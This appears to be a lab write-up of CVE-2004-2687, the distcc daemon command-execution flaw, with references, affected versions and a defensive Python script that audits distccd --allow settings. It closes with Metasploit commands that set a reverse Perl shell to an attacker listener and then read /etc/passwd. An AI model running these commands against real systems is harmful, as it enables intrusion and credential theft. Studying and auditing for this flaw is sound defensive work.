CVE-2004-2687 : DistCC Daemon Command Execution

Timeline :

Vulnerability discovered by Ray Slakinski & Jason McLeod
Vulnerability publicly released on 2005-03-10
Metasploit PoC provided on 2006-01-20 (not sure)

PoC provided by :

hdm

Reference(s) :

CVE-2004-2687
OSVDB-13378

Affected version(s) :

DistCC 1.x
DistCC versions below or equal to 2.18.3

Tested on Metasploitable with :

DistCC 2.18.3-4.1ubuntu1

Description :

This module uses a documented security weakness to execute arbitrary commands on any system running distccd.
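
A defender-side check for the weakness described above, as an added example that is not part of the original page or of the distcc project: it audits distccd command lines for a missing or overly broad --allow option. The sample command lines and the /16 threshold are constructed assumptions, and it assumes the distcc 2.x behaviour where a daemon started without --allow accepts jobs from any host.

```python
import ipaddress
import shlex

# Constructed sample distccd command lines (not taken from the page).
SAMPLES = [
    "/usr/bin/distccd --daemon --user daemon",
    "/usr/bin/distccd --daemon --allow 0.0.0.0/0",
    "/usr/bin/distccd --daemon --allow 127.0.0.1 --listen 127.0.0.1",
    "/usr/bin/distccd --daemon -a 192.168.178.0/24 --allow=10.0.0.0/8",
]

# Assumption for this example: anything wider than a /16 counts as too broad.
MAX_ADDRESSES = 2 ** 16


def allow_values(cmdline):
    """Collect the values given as '--allow X', '-a X' or '--allow=X'."""
    args = shlex.split(cmdline)
    values = []
    for i, arg in enumerate(args):
        if arg in ("--allow", "-a") and i + 1 < len(args):
            values.append(args[i + 1])
        elif arg.startswith("--allow="):
            values.append(arg.split("=", 1)[1])
    return values


def audit(cmdline):
    """Return a list of findings; an empty list means access is restricted."""
    values = allow_values(cmdline)
    if not values:
        return ["no --allow option: jobs are accepted from any client"]
    findings = []
    for value in values:
        try:
            net = ipaddress.ip_network(value, strict=False)
        except ValueError:
            findings.append(f"--allow {value}: not a parsable address or network")
            continue
        if net.num_addresses > MAX_ADDRESSES:
            findings.append(f"--allow {net}: too broad ({net.num_addresses} addresses)")
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", audit(sample) or "ok")
```

On a live host the same function can be fed the distccd entries from the process list instead of the constructed samples.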

Commands :

use exploit/unix/misc/distcc_exec
set RHOST 192.168.178.45
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit

id
uname -a
cat /etc/passwd